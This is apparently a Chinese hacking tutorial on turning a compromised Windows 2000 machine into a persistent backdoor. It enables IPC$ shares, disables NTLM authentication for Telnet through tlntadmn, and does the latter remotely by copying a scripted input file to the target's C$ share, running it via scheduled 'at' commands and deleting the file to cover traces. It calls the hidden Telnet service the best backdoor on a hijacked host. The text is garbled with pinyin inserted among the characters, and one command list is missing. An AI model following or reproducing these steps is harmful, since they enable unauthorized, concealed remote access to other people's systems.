在入侵中，得到管理員帳號之后，很多事情顯得輕而易舉，可有時(shí)候幸運(yùn)之神并不是總落在你身上的，這不，剛剛溢出成功內(nèi)網(wǎng)的機(jī)器，本想用IPC$連接上去，竟發(fā)現(xiàn)“網(wǎng)絡(luò)路徑不存在”，看來有必要先運(yùn)行一次：net share /y 啟動共享服務(wù)，顯示成功后，終于連接搞定了！不過在接下來的開Telnet服務(wù)中便遇到了NTLM認(rèn)證的問題，搬出自己習(xí)慣使用的工具：不依賴于IPC共享的VBS腳本，連忙傳上去。運(yùn)行之后卻顯示不成功，納悶了。只能驅(qū)貓上線，繼續(xù)我那無期的學(xué)習(xí)之路了，半晌終于找到一篇關(guān)開打開Telnet的教學(xué)，在再三測試后終于成功打開了那部機(jī)器的Telnet，經(jīng)驗(yàn)不敢獨(dú)享，寫出來與大家共賞。

我們知道WIN2000中自帶Tlntadmn命令，它可以更改Telnet的端口、運(yùn)行參數(shù)、最大登錄人數(shù)等等，可惜討厭的NTLM認(rèn)證會讓我們遠(yuǎn)程無法登陸，現(xiàn)在我們需要的是擺脫NTLM認(rèn)證的問題：

方法1：手動修改Tlntadmn：

我們按下面的命令直接在本地ＣＭＤ下操作：

Ｃ:\WINNT\system32>tlntadmn.exe

Microsoft (R) Windows 2000 (TM) (內(nèi)部版本號 2195)

Telnet Server Admin (Build 5.00.99201.1)

請?jiān)谙铝羞x項(xiàng)中選擇一個(gè):

0) 退出這個(gè)應(yīng)用程序

1) 列出當(dāng)前用戶

2) 結(jié)束一個(gè)用戶的會話 ...

3) 顯示 / 更改注冊表設(shè)置 ...

4) 開始服務(wù)

5) 停止服務(wù)

請鍵入一個(gè)選項(xiàng)的號碼 [0 - 5] 以選擇該選項(xiàng)：

選3回車進(jìn)入設(shè)置，進(jìn)入如下子界面：

請?jiān)谙铝羞x項(xiàng)中選擇一個(gè)：

0) 退出這個(gè)菜單

1) AllowTrustedDomain

2) AltKeyMapping

3) DefaultDomain

4) DefaultShell

5) LoginScript

6) MaxFailedLogins

7) NTLM

8) TelnetPort

請鍵入一個(gè)選項(xiàng)的號碼 [0 - 8] 以選擇該選項(xiàng)：

我們選7，回車進(jìn)入設(shè)置：NTLM的當(dāng)前值=2，我們給它設(shè)置成１就可以了。設(shè)置完成后重啟Telnet服務(wù)：net stop Telnet、net start Telnet，再在本地連接23端口，輸入管理員帳號密碼就OK了！手動修改ＮＴＬＭ的方法就這么簡單，在平時(shí)入侵的時(shí)候，如果有３３８９等遠(yuǎn)程連接方式，推薦大家使用這樣的方法去修改。

方法２：利用腳本修改Tlntadmn：

有時(shí)我們出于特殊原因不要求立即停止Telnet服務(wù)或是變更NTLM模式，這時(shí)我們必須借助AT命令：at \\IP time 程序名，但實(shí)際上操作的話我們會發(fā)現(xiàn)：類似tlntadmn這樣的程序是控制臺的一個(gè)交互式工具，其參數(shù)設(shè)置并不能很好的被AT命令所調(diào)用，我們應(yīng)如何處理呢？換句話說在沒有３３８９等遠(yuǎn)程登陸的模式下，如何給方便的給對方開啟Ｔelnet服務(wù)呢？我們可以將命令寫入一個(gè)txt文件，再加以調(diào)用。寫入的命令請按照下面的順序：

停止服務(wù)(5)->更改設(shè)置(3)->NTLM(7)->確認(rèn)更改(y)->修改NTLM當(dāng)前值(0)->再次確認(rèn)(y)->退出菜單(0)->啟動服務(wù)(4)->退出程序(0)

在方法１中我們知道在每個(gè)選擇后面都要回車確認(rèn)運(yùn)行，所以我們要模擬操作寫入的數(shù)據(jù)應(yīng)是：

5(回車)3(回車)7(回車)y(回車)0(回車)y(回車)0(回車)4(回車)0(回車)

現(xiàn)在我們有二種思路接下去做：一是直接在被入侵機(jī)器的CMD上制作txt文件以供調(diào)用；二是在本地生成txt再上傳到被入侵機(jī)器以供調(diào)用。

下面我們看他們分別是如何實(shí)現(xiàn)的：

1．直接在被入侵機(jī)器的CMD上制作txt文件以供調(diào)用。依次在cmd下如此運(yùn)行命令：

只須按上面的命令行一行行打入運(yùn)行就可以了。效果與方法１是等同的。

2．在本地生成txt再上傳到被入侵機(jī)器以供調(diào)用。在本地機(jī)器上做一個(gè)Telnet.txt文件，內(nèi)容如下：

5 
3 
7 
y 
0 
y 
0 
4 
0 

注意每一行都要加回車，然后將這個(gè)文件上傳到被入侵機(jī)器的C：盤下：

copy Telnet.txt \\ip\c$

再設(shè)置在某時(shí)間內(nèi)啟動并刪除巳上傳文件：

at \\ip time "c:\winnt\system32\tlntadmn.exe < c:\Telnet.txt" 
at \\ip time "del c:\Telnet.txt /f"

很簡單的dos管道重定向原理，這樣就完成tlntadmn的交互過程。效果與方法A是等同的，簡單那吧？

Tlntadmn在處理Telnet上顯得異常強(qiáng)大，在入侵過程中如果能熟練應(yīng)用它，那么開放Telnet服務(wù)將顯得輕而易舉，當(dāng)然，隱蔽的telnet服務(wù)也就是肉雞上最好的后門了！你學(xué)會了嗎？